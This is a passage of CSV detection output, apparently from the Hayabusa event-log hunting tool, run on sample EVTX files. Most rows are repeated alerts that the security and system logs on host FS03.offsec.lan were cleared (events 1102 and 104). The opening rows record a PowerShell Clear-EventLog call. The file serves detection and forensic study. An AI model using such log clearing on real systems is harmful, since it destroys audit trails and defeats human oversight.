ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.334 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.350 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:09:51.875 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.002 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.080 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.095 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.127 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.142 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.215 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.293 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.340 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.355 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.418 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.480 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.527 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.574 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.591 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.606 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.638 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.653 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.669 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.794 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.841 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.888 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.903 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.950 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.028 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.044 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.059 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.075 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.138 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.200 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.216 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.231 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.263 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.294 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.309 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.325 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.341 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.356 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.403 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.419 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.434 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.450 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.481 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.481 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.497 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.528 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.763 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.794 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.809 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.934 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.028 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.091 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.200 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.216 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.247 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.341 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.388 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.403 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.450 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.559 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.575 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.622 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.700 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.825 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.841 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.872 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.888 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.903 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.059 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.075 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.153 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:12.247 +00:00,FS03.offsec.lan,104,high,Evas,System Log 